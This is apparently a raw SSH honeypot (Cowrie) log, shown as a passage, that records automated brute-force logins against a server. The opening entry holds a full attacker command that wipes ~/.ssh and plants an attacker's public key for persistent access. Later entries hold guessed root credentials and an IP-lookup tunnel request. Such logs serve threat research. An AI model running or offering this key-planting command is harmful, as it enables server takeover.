{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:12:12.352268Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:12:12.622509Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:12.623420Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":41258,"dst_ip":"1.2.3.4","dst_port":22,"session":"d004d3b17865","protocol":"ssh","message":"New connection: 103.217.145.104:41258 (1.2.3.4:22) [session: d004d3b17865]","sensor":"my-vps","timestamp":"2025-08-26T04:12:12.893855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:12:12.894544Z","src_ip":"103.217.145.104","session":"d004d3b17865"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:12:13.163351Z","src_ip":"103.217.145.104","session":"d004d3b17865"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:14.281532Z","src_ip":"103.217.145.104","session":"d004d3b17865"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:15.553727Z","src_ip":"103.217.145.104","session":"d004d3b17865"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":41264,"dst_ip":"1.2.3.4","dst_port":22,"session":"5457dd2d5a23","protocol":"ssh","message":"New connection: 103.217.145.104:41264 (1.2.3.4:22) [session: 5457dd2d5a23]","sensor":"my-vps","timestamp":"2025-08-26T04:12:15.816755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:12:15.817706Z","src_ip":"103.217.145.104","session":"5457dd2d5a23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:12:16.082125Z","src_ip":"103.217.145.104","session":"5457dd2d5a23"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:12:17.170136Z","src_ip":"103.217.145.104","session":"5457dd2d5a23"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:17.430818Z","src_ip":"103.217.145.104","session":"aa30c503acfe"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:17.433285Z","src_ip":"103.217.145.104","session":"5457dd2d5a23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59332,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f0ae01c749b","protocol":"ssh","message":"New connection: 212.227.235.229:59332 (1.2.3.4:22) [session: 7f0ae01c749b]","sensor":"my-vps","timestamp":"2025-08-26T04:12:19.708087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:19.711609Z","src_ip":"212.227.235.229","session":"7f0ae01c749b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:20.179912Z","src_ip":"212.227.235.229","session":"7f0ae01c749b"}
{"eventid":"cowrie.login.failed","username":"kelly","password":"kelly","message":"login attempt [kelly/kelly] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:22.000466Z","src_ip":"212.227.235.229","session":"7f0ae01c749b"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:23.270413Z","src_ip":"212.227.235.229","session":"7f0ae01c749b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59344,"dst_ip":"1.2.3.4","dst_port":22,"session":"b06f9b6c496b","protocol":"ssh","message":"New connection: 212.227.235.229:59344 (1.2.3.4:22) [session: b06f9b6c496b]","sensor":"my-vps","timestamp":"2025-08-26T04:12:23.351175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:23.354002Z","src_ip":"212.227.235.229","session":"b06f9b6c496b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:23.628585Z","src_ip":"212.227.235.229","session":"b06f9b6c496b"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:12:25.756021Z","src_ip":"212.227.235.229","session":"b06f9b6c496b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:12:26.016146Z","session":"b06f9b6c496b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:12:26.883018Z","src_ip":"212.227.235.229","session":"b06f9b6c496b"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:28.081711Z","src_ip":"212.227.235.229","session":"b06f9b6c496b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41332,"dst_ip":"1.2.3.4","dst_port":22,"session":"28e653af6f6f","protocol":"ssh","message":"New connection: 212.227.235.229:41332 (1.2.3.4:22) [session: 28e653af6f6f]","sensor":"my-vps","timestamp":"2025-08-26T04:12:31.060965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:31.115399Z","src_ip":"212.227.235.229","session":"28e653af6f6f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:12:31.314187Z","src_ip":"212.227.235.229","session":"28e653af6f6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47056,"dst_ip":"1.2.3.4","dst_port":22,"session":"95bb842fcf78","protocol":"ssh","message":"New connection: 212.227.235.229:47056 (1.2.3.4:22) [session: 95bb842fcf78]","sensor":"my-vps","timestamp":"2025-08-26T04:12:31.677155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:12:31.678056Z","src_ip":"212.227.235.229","session":"95bb842fcf78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:12:31.955053Z","src_ip":"212.227.235.229","session":"95bb842fcf78"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn2023","message":"login attempt [vpn/vpn2023] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:33.107210Z","src_ip":"212.227.235.229","session":"95bb842fcf78"}
{"eventid":"cowrie.login.failed","username":"vyos","password":"vyos","message":"login attempt [vyos/vyos] failed","sensor":"my-vps","timestamp":"2025-08-26T04:12:33.548278Z","src_ip":"212.227.235.229","session":"28e653af6f6f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:34.386502Z","src_ip":"212.227.235.229","session":"95bb842fcf78"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:12:35.539614Z","src_ip":"212.227.235.229","session":"28e653af6f6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44608,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd0d5204eb49","protocol":"ssh","message":"New connection: 212.227.235.229:44608 (1.2.3.4:22) [session: dd0d5204eb49]","sensor":"my-vps","timestamp":"2025-08-26T04:12:38.147569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:12:38.164258Z","src_ip":"212.227.235.229","session":"dd0d5204eb49"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ec